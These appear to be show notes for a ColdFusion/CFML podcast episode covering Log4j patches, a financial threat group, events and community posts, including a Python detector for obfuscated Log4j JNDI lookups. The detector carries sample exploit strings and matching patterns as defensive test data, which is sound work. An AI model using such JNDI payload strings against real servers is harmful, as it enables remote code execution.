2022-01-11 Weekly News - Episode 130

Watch the video version on YouTube at https://youtu.be/BkIKAlDLFkQ


Hosts:
Gavin Pickin - Senior Software Developer for Ortus Solutions
Eric Peterson  - Senior Software Developer for Ortus Solutions

Thanks to our Sponsor - Ortus Solutions

The makers of ColdBox, CommandBox, ForgeBox, TestBox and almost every other Box out there. 
A few ways  to say thanks back to Ortus Solutions:

Like and subscribe to our videos on YouTube.
Subscribe to our Podcast on your Podcast Apps and leave us a review.
Sign up for a free or paid account on CFCasts, which is releasing new content every week.
Buy Ortus’s Book - 102 ColdBox HMVC Quick Tips and Tricks on GumRoad (http://gum.co/coldbox-tips)

Patreon Support

We have 37 patrons providing 97% of the funding for our Modernize or Die Podcasts via our Patreon site: https://www.patreon.com/ortussolutions.

News and Events


Upcoming Ortus Webinar - cbwire + Alpine.js with Grant Copley

January 28, 2022 - 11:00 AM CT - Central Time (US and Canada)
In this webinar, Grant, lead developer for cbwire, will showcase how to build modern, reactive CFML apps easily using very little JavaScript.
Register today: https://www.ortussolutions.com/events/webinars

Log4j Updates

Log4j 2.17.1 patch released. CommandBox images have been updated with the latest patched log4j jars.
Adobe has an updated technote: https://helpx.adobe.com/coldfusion/kb/log4j-2-17-0-vulnerability-coldfusion.html
Other libraries, like Spreadsheet-CFML, have updated as well.
Note: Log4j2 support in Lucee 5.3 is in progress for 5.3.9.

‘Elephant Beetle’ Lurks for Months in Networks

The group blends into an environment before loading up trivial, thickly stacked, fraudulent financial transactions too tiny to be noticed but adding up to millions of dollars.
This beetle adores Java. The group is “highly proficient” with Java-based attacks and often targets legacy Java apps running on Linux machines – primarily, the Java-based web servers WebSphere and WebLogic – as a means of initial entry to a target environment, the researchers explained. Beyond that, Elephant Beetle even deploys its own, complete Java web application to do the gang’s bidding on compromised machines that are, meanwhile, chugging along, running legitimate apps.
https://threatpost.com/elephant-beetle-months-networks-financial/177393/?fbclid=IwAR0ytUYx0IOxiNXIUE1jHvqDV0ltP_hBf7XCdEyLEYHfSaKadwf01xPkHLI


Adobe Workshops

More Adobe #ColdFusion Workshops announced, led by Damien Bruyndonckx
2 dates announced:
February 2, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST

March 09, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST

https://cf-workshop.meetus.adobeevents.com/

AngularJS EOL’ed 12/31/2021

As AngularJS is faced with an uncertain future, many teams are searching for answers to the current hot topic: if you are using AngularJS, do you continue to maintain your AngularJS applications or do you migrate your applications to another framework? This is not an easy (or cheap) question to answer.
In this article, we’ll go over some of the reasons why you should consider migrating your AngularJS applications, and some ideas on how to plan and budget for a successful migration.
https://www.thisdot.co/blog/why-you-should-consider-migrating-from-angularjs-to-vue

CFCasts Content Updates

https://www.cfcasts.com 

Just Released

Into the Box 2021 sessions are now all FREE - https://cfcasts.com/series/into-the-box-2021


Coming soon

Into the Box LATAM


Send your suggestions at https://cfcasts.com/support


Conferences and Training


VueJS Nation Conference

Online Live Event
January 26th & 27th 2022
Register for Free
https://vuejsnation.com/

More conferences
Need more conferences? This site has a huge list of conferences for almost any language/community.
https://confs.tech/

Blogs, Tweets and Videos of the Week


Tweet - Adam Cameron - TIL something new about CFOUTPUT
I cannot go into details of why this is a good find, but I was unaware that one can pass an encoding algorithm name like `<cfoutput encodefor="html">` (and a bunch of others) which will automatically escape the values in `#expression#`. Didn't know that.
https://cfdocs.org/cfoutput
https://twitter.com/adam_cameron/status/1480624980668915716
https://twitter.com/adam_cameron


Tweet - James Moberg - Microsoft taking log4j stuff seriously.
While performing some #coldfusion unit testing to identify #log4j exploit attempts (that my WAF may miss), I had to obfuscate the test strings or @msftsecurity would instantly quarantine & report the script. It's good to see that Microsoft is taking this seriously. #cfml
https://twitter.com/gamesover/status/1476347523245694984
https://twitter.com/gamesover


Blog - James Moberg - Log4j Exploit Pattern Detection Using ColdFusion/CFML
Here are my initial attempts at trying to detect Log4j exploit attempts that may make it past our WAF/service provider protections. While our WAF stopped requests from Trend Micro's Log4j Tester, obfuscated requests made it through. At the time of testing, Azure wasn't blocking requests. I had to be a little careful with the script as Windows kept instantly quarantining the CFM files and prevented ColdFusion from executing the template.
2021-12-29: Updated rules based on Google Cloud article to additionally block rmi, ldaps & dns (in addition to stripping whitespace).
https://dev.to/gamesover/log4j-exploit-pattern-detection-using-coldfusioncfml-4l17
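The blog post above describes a CFML detection script; the following is an added Python example, not James Moberg's code and not taken from the post, that shows the same defensive idea: normalize a request value first (percent-decode, strip whitespace, flatten case-changing lookup wrappers) and only then look for a JNDI lookup, reporting which scheme it uses. The header names, hostnames (on the reserved `.invalid` TLD) and request values are constructed samples, and the list of schemes comes from the post's 2021-12-29 update note.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Schemes named in the blog's 2021-12-29 rule update. Any other scheme in a
# JNDI lookup is still reported; this list only marks the "expected" ones.
KNOWN_SCHEMES = ("ldap", "ldaps", "rmi", "dns")

# ${lower:x} / ${upper:x} wrappers around a fragment that contains no braces.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# A JNDI lookup; group 1 captures the scheme (ldap, rmi, dns, ...).
_JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):")


def normalize(value: str) -> str:
    """Undo cheap obfuscations before pattern matching.

    - percent-decode twice so double-encoded input is seen in the clear
    - drop all whitespace (the blog post's own first hardening step)
    - flatten ${lower:x} / ${upper:x} wrappers to x until none remain, so
      keywords that were split into wrapped pieces are rejoined
    - lower-case the result so one regex covers every case mix
    """
    s = unquote(unquote(value))
    s = re.sub(r"\s+", "", s)
    previous = None
    while previous != s:  # repeat until no wrapper is left (handles nesting)
        previous = s
        s = _CASE_WRAPPER.sub(r"\1", s)
    return s.lower()


def find_jndi_scheme(value: str) -> Optional[str]:
    """Return the scheme of a JNDI lookup found in value, or None if there is none."""
    match = _JNDI_LOOKUP.search(normalize(value))
    return match.group(1) if match else None


def scan_request(headers: dict, query: str) -> List[Tuple[str, str]]:
    """Check every header value and the query string; return (field, scheme) per hit."""
    hits: List[Tuple[str, str]] = []
    for name, val in headers.items():
        scheme = find_jndi_scheme(val)
        if scheme:
            hits.append(("header:" + name, scheme))
    scheme = find_jndi_scheme(query)
    if scheme:
        hits.append(("query", scheme))
    return hits


# Constructed sample request (not captured traffic); hosts use the .invalid TLD.
SAMPLE_HEADERS = {
    "User-Agent": "Mozilla/5.0 ${${lower:j}ndi:${upper:L}dap://example.invalid/a}",
    "X-Forwarded-For": "203.0.113.5",
    "Referer": "https://example.invalid/page?x=%24%7Bjndi%3A%20rmi%3A%2F%2Fexample.invalid%2Fb%7D",
}
SAMPLE_QUERY = "search=${jndi: dns://example.invalid/c}"

if __name__ == "__main__":
    for field, scheme in scan_request(SAMPLE_HEADERS, SAMPLE_QUERY):
        note = "" if scheme in KNOWN_SCHEMES else " (scheme not in the known list)"
        print(f"JNDI lookup via {scheme} in {field}{note}")
```

Matching on the normalized string is what lets one short pattern catch the whitespace-padded and percent-encoded variants the post says slipped past the WAF; it is still a signature check, so treat a hit as a reason to block and log, not as proof that the rest of the request is clean.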


Tweet - Zac Spitzer - Show some love for the VS Code CFML Extension
Awesome to see some activity on the vscode-cfml extension, a new minor release coming soon.
If you use it, please show some love and star the repo
https://github.com/KamasamaK/vscode-cfml
#lucee #coldfusion #cfml
https://twitter.com/zackster/status/1476206001384828929
https://twitter.com/zackster


Blog - Ben Nadel - Building An API Client With The fet...

Twitter Mentions